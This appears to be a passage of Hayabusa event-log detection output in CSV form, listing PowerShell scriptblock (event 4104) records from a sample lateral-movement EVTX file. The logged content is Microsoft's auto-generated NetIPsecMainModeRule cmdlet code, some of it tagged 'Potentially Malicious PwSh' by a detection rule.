[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 